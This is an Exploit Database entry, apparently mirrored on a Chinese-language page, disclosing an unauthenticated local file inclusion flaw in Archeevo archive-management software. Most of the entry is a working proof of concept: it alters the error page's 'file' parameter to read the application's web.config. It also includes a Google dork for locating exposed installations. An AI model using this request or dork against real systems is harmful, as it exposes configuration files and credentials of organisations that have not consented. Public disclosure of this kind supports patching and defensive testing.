Archeevo 5.0 – Local File Inclusion

• Exploit Database
• 16 阅读

• 作者： Miguel Santareno
  日期： 2022-01-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50665/

• # Exploit Title: Archeevo 5.0 - Local File Inclusion
  # Google Dork: intitle:"archeevo"
  # Date: 01/15/2021
  # Exploit Author: Miguel Santareno
  # Vendor Homepage: https://www.keep.pt/
  # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
  # Version: < 5.0
  # Tested on: windows
  
  # 1. Description
  
  Unauthenticated user can exploit LFI vulnerability in file parameter.
  
  
  # 2. Proof of Concept (PoC)
  
  Access a page that don’t exist like /test.aspx and then you will be redirected to
  https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
  
  After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
  /web.config file of the application.
  
  https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
  
  
  # 3. Research:
  https://miguelsantareno.github.io/MoD_1.pdf